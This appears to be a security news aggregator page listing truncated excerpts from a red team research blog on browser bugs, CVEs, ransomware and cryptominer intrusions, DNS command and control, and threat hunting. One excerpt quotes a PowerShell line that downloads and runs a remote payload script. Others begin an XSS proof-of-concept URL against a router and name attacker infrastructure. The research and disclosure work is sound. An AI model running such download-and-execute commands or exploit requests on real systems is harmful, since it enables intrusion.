What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2020-08-24 15:33:59 | Stealing local files using Safari Web Share API (lien direct) | DescriptionIn general Web Share API [https://w3c.github.io/web-share/] allows users to share links from the browser via 3rd party applications (e.g. mail and messaging apps). The problem is that file: scheme is allowed and when a website points to such URL unexpected behavior occurs. In case such a link is passed to the navigator.share function an actual file from the user file system is included in the shared message which leads to local file disclosure when a user is sharing it unknowingly. The problem is not very serious as user interaction is required, however it is quite easy to make the shared file invisible to the user. The closest comparison that comes to mind is clickjacking as we try to convince the unsuspecting user to perform some action.Below are the steps to reproduce the issue:1. Visit https://overflow.pl/webshare/poc1.html using | Guideline | ||
|
2020-08-18 17:13:54 | Rocket.Chat Cross-Site Scripting leading to Remote Code Execution CVE-2020-15926 (lien direct) | Product descriptionRocket.Chat [https://rocket.chat] is an open source multiplatform messaging application similar to Slack. It is available as a self-hosted solution or in a SaaS model. Rocket.Chat can be used via a web browser, iOS, Android or using Electron based clients available for Windows, Linux and MacOS.Affected softwareThe following application versions are vulnerable:Rocket.Chat | Vulnerability Guideline | ||
|
2020-07-10 14:59:09 | BadWPAD and spear-phishing using Battle.net Desktop App (lien direct) | Brief introductionIn this blog post I would like to describe an example which shows how serious the consequences of a successful badWPAD attack can be. It is not possible to perform a MiTM (man-in-the-middle) attack on encrypted HTTPS communication without accepting a rogue certificate, however an attacker can modify cleartext HTTP traffic. This attack can be successfully performed in many modern applications which still use plain HTTP protocol for communication, updates etc. One such example is the Battle.net Desktop App used by millions of users around the world. An attacker can change information presented to a victim in many different locations inside the application to perform high quality social engineering attacks on a mass scale.MiTM attack on Battle.net Desktop AppHow can this attack be used to perform a high quality non-email based spear-phishing? I am going to demonstrate thi | |||
|
2020-06-24 00:15:32 | Google Chrome fuzzing conclusion (lien direct) | BackgroundThis post will be a summary of a small fuzzing exercise that I was running over the course of a few months (from May 2019 to March 2020) where the focus was mostly on experimental and non-default features of the Google Chrome browser. As described in the first blog post [https://blog.redteam.pl/2019/12/chrome-portal-element-fuzzing.html] domato [https://github.com/googleprojectzero/domato] was used for test case generation due to the reason I wanted to start as soon as possible.Initially it was only about the element. However various other features were added to the fuzzing grammar over time with some of them providing good results as well. Results | Vulnerability | ||
|
2020-06-18 22:10:28 | Spear-phishing campaign tricks users to transfer money (TTPs & IOC) (lien direct) | We are publishing the following information in order to help organisations to identify this threat before attackers will perform successful phishing on their employees. Attackers are targeting companies which have foreign trading partners, i.a. in Asia, to perform a wire transfer to a wrong bank account number.We found that domains registered using muhammad.appleseed1@mail.ru e-mail address are actively used in a spear phishing campaign that aims to trick targets to transfer money into bank accounts controller by the attacker using social engineering.Most likely attack scenario looks like following:There is an ongoing e-mail communication between company X and YAn attacker has gained access to an e-mail account of one of the parties | Threat Guideline | APT 15 | |
|
2020-06-12 21:35:46 | Black Kingdom ransomware (TTPs & IOC) (lien direct) | We would like to share with the community the following TTPs and IOC related to Black Kingdom ransomware and threat actors using it.Attackers gained initial access to the infrastructure via Pulse Secure VPN vulnerability [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510].For persistence they use a scheduled task [https://attack.mitre.org/techniques/T1053/]. Task name is GoogleUpdateTaskMachineUSA, which resembles a legitimate task of | Ransomware Vulnerability Threat | ||
|
2020-06-03 13:55:20 | Kinsing cryptocurrency mining malware (TTPs & IOC) (lien direct) | We would like to share with the community the following TTPs and IOC related to Kinsing cryptocurrency mining malware as most research is focused directly on analysis malware samples rather than how it infects the system.TTPsAttackers are using RCE vulnerability in Liferay which is identified as CVE-2020-7961 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7961]. There is a publicly available PoC on GitHub [https://github.com/mzer0one/CVE-2020-7961-POC/blob/master/poc.py] for this vulnerability, which matched most artifacts we have found on the targeted system.Attackers are sending the payload using a HTTP POST request:POST /api/jsonws/invoke | Malware Vulnerability | ||
|
2020-05-20 13:43:15 | Sodinokibi / REvil / Maze ransomware (TTPs & IOC) (lien direct) | We secured forensics evidence data in the form of disk images of VPS servers used by cybercriminals behind Sodinokibi / REvil ransomware (we also found Maze ransomware there):decryptor.ccdnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion | Ransomware Vulnerability | ||
|
2020-04-14 11:45:32 | Google Chrome display locking fuzzing (lien direct) | BackgroundWhile searching for interesting new functionalities in Google Chrome that would potentially be good targets for hunting security bugs I found display locking [https://www.chromestatus.com/feature/4613920211861504]. In general it is related to rendering optimization, so it caught my attention as something that is affecting how the web page layout is displayed. Functionalities like this should always attract attention as potential source of vulnerabilities. Currently display locking is hidden behind a flag (#enable-display-locking).SetupI used the same setup already described in my previous blog post about fuzzing the portal element [ | Vulnerability | ||
|
2020-03-18 17:56:30 | DNS for red team purposes (lien direct) | IntroductionIn the following blog post I would like to demonstrate a proof-of-concept for how red teamers can build DNS command & control (DNS C2, DNS C&C), perform DNS rebinding attack and create fast flux DNS. We will focus only on the DNS server part without building a complete working platform.This approach can also be used by | Malware Threat | ||
|
2020-02-04 18:49:09 | Network data manipulation on the fly (lien direct) | AbstractVarious type of security assessments ranging from regular penetration testing, through red teaming operations up to breaking IoT/ICS devices and SCADA involves playing with binary network protocols what requires intercepting and modification of network data between client and the target. Sniffing of the network traffic is not a big deal as we have tools like Wireshark, Tcpdump or Scapy, however modification is more challenging because we would need to have kind of an interface to read the network data, filter it, modify on the fly and send it back to the target host in almost real time. In addition, it would be perfect if such tool could auto handle multiple connections in parallel and be scriptable.One time I found a tool called maproxy | Tool | ||
|
2020-01-09 19:05:39 | Deceiving blue teams using anti-forensic techniques (lien direct) | Brief introductionIn this short post I would like to demonstrate one of the techniques used by red teamers and real attackers to set up decoys for blue teamers. Defenders should be aware that they are not alone in setting traps such as honeypots, advanced attackers are also actively looking to fool blue team (usually the goal is to make analysis more difficult and keep malicious content operational for longer period of time).Headers dependent responseLet's assume that the blue team analyzes an incident and they had found that remote PowerShell payload has been executed:IEX (New-Object Net.WebClient).DownloadString("https://example.com/payload.ps1") ( |
|||
|
2019-12-06 20:29:30 | Google Chrome portal element fuzzing (lien direct) | BackgroundSome time ago, while browsing my Twitter feed I stumbled upon an interesting tweet from Michał Bentkowski [https://twitter.com/SecurityMB/status/1127963181089992705]. The description of the new portal element certainly grabbed my attention as something that may have an impact on security. You can learn more about the portal element from here [https://web.dev/hands-on-portals] and here [https://wicg.github.io/portals/]. At the moment of writing this article the portal element is still behind a flag (#enable-portals), however it is available in the Google Chrome | |||
|
2019-10-18 13:25:14 | Bypassing LLMNR/NBT-NS honeypot (lien direct) | AbstractMITRE ATT&CK™ [https://attack.mitre.org/] “is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations” which recommends the Conveigh honeypot [https://github.com/Kevin-Robertson/Conveigh] for detection of the LLMNR/NBT-NS Poisoning and Relay | Threat Guideline | Deloitte | ★★ |
|
2019-10-06 23:12:03 | Internal domain name collision (lien direct) | Brief introductionInternal domain name collisions occurs when the organisations are using local domains in the internal network and the same domain names exist also outside of the organisation, on a global DNS. DNS query which should resolve to the internal resources leaks to the Internet. If an attacker is able to control such domain on global DNS then he can perform a MITM (Man-in-the-Middle) attacks on an organisation.Name collisionDNS name collision changed into much more severe problem when it became possible to register new TLDs (Top-Level Domain) [https://data.iana.org/TLD/tlds-alpha-by-domain.txt], especially these owned by DONUTS company [https://donuts.domains/great-domains/domain-categories/]. Most problematic TLDs which could be used in attacks are inter alia: network | APT 32 | ||
|
2019-09-05 19:27:02 | CVE-2019-10677 Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID (lien direct) | With recent software update of DASAN Zhone Solutions (DZS) routers, the company pushed fixes for multiple vulnerabilities I found in it [https://redteam.pl/poc/dasan-zhone-znid-gpon-2426a-eu.html, https://www.exploit-db.com/exploits/47351]. Vulnerabilities got registered under CVE-2019-10677 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10677]. Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters. This vulnerability affects all zNID(s) models running following firmware versions: all releases of 3.0.xxx SW (on 3.0 branch), release 3.1.349 and earlier (on 3.1 branch), release 3.2.087 and earlier (on 3.2 branch), release 4.1.253 and earlier (on 4.1 branch), release 5.0.019 and earlier (on 5.0 branch).You can find a short description of this issues and proof-of-concept code below.There is a limit of characters passed from the user to variables in the application, when we will pass 50*A and 50*B in vulnerable GET parameters:http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg= | Vulnerability | ||
|
2019-08-14 21:45:48 | Threat hunting using DNS firewalls and data enrichment (lien direct) | After seeing a few advertisements about DNS firewalls and how expensive they are, I want to share my experience with blue teamers about how DNS firewalls work and how that knowledge can be used for in-house threat hunting solutions and/or building your own DNS firewall (aka do it yourself). These are examples of an approach to detect malicious behaviour, not a tailor made solutions.At the beginning I would like to highlight that it's a good practice to monitor not only logs but also DNS traffic in real time. Such traffic isn't encrypted and if you only check DNS server logs then you can miss direct requests to other DNS servers. Additionally you can also use recently published version of Sysmon [https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon] which supports DNS queries in event ID 22 (DNSEvent).The DNS queries used below that end with | Spam Malware Threat Guideline | APT 18 | |
|
2019-07-23 13:14:10 | Sinkholing BadWPAD infrastructure - wpad.pl / wpadblocking.com case (part 4) (lien direct) | IntroductionWe started research related to BadWPAD attack (WPAD Name Collision Vulnerability [https://www.us-cert.gov/ncas/alerts/TA16-144A]) which was mainly focused on the wpadblocking.com project because it targeted millions of computers [https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html] for over the last 10 years (!). In the second publication we made a deeper analysis of the WPAD file [https://blog.redteam.pl/2019/05/badwpad-and-wpad-pl-wpadblocking-com.html] to prove that it had ad | Guideline |
1
We have: 18 articles.
We have: 18 articles.
To see everything:
Our RSS (filtrered)
